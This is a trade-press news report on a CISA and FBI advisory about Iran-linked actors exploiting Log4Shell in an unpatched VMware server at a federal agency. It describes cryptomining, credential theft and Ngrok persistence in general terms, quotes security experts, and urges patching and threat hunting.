Iran-linked threat actors exploiting Log4Shell via unpatched VMware, feds warn – Cybersecurity Dive




State-backed Iranian threat actors are exploiting a Log4Shell vulnerability inside an unpatched VMware server at a federal civilian agency, the Cybersecurity and Infrastructure Security Agency warned in a joint advisory with the FBI Wednesday.   
After conducting an investigation from mid-June into July, authorities discovered that attackers installed XMRig cryptomining software and moved laterally into a domain controller. The actors stole credentials and installed Ngrok reverse proxies to maintain persistence inside the network. 
All organizations with affected VMware systems that failed to patch or apply workarounds should assume compromise and hunt for threats, according to the advisory. If initial access or compromise is suspected, organizations should investigate any connected systems and conduct audits on privileged accounts. 
“Today’s advisory highlights the importance of continued focus on mitigating known exploited vulnerabilities such as Log4Shell and the need for all organizations to implement effective detections to proactively identify malicious activity before damaging impacts occur,” Eric Goldstein, executive assistant director for cybersecurity at CISA, said in an emailed statement.
While government and private sector organizations worked urgently to mitigate assets running vulnerable versions of Log4j, malicious cyber actors moved quickly to exploit vulnerable systems and are still doing so, Goldstein said.  
It is not immediately known why the agencies are issuing an advisory at this particular time; it has been months since the prior activity was observed. 
Analysts at Mandiant said criminal actors may be working with Iran in a way that makes it difficult to distinguish between what’s criminal or nation-state activity. 
“Iran and their peers depend on contractors to carry out cyber espionage and attack activities,” John Hultquist, head of intelligence analysis at Mandiant, said in a statement. “Many of these contractors moonlight as criminals and it can be difficult to distinguish this activity from the work at the behest of the state.”
Sonatype CTO Brian Fox said about 38% to 40% of Log4j downloads, or about, 20,0000, are still vulnerable to Log4Shell.
“The advisory should serve as a warning that everyone in the industry, especially those in the federal space, to not lose sight of continuing to find straggling systems with potentially vulnerable versions,” Fox said via email. 
Get the free daily newsletter read by industry experts
The agency placed a premium on low cost, high impact security efforts, which account for more than 40% of the goals.
Companies trying to fill cybersecurity roles need to stop looking for unicorns and expand their search to qualified, but often overlooked, job candidates.  
Keep up with the story. Subscribe to the Cybersecurity Dive free daily newsletter
Keep up with the story. Subscribe to the Cybersecurity Dive free daily newsletter
Subscribe to Cybersecurity Dive for top news, trends & analysis
Get the free daily newsletter read by industry experts
Want to share a company announcement with your peers?
Get started
The agency placed a premium on low cost, high impact security efforts, which account for more than 40% of the goals.
Companies trying to fill cybersecurity roles need to stop looking for unicorns and expand their search to qualified, but often overlooked, job candidates.  
The free newsletter covering the top industry headlines

source


CyberTelugu

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top

Adblock Detected

Please consider supporting us by disabling your ad blocker

Refresh Page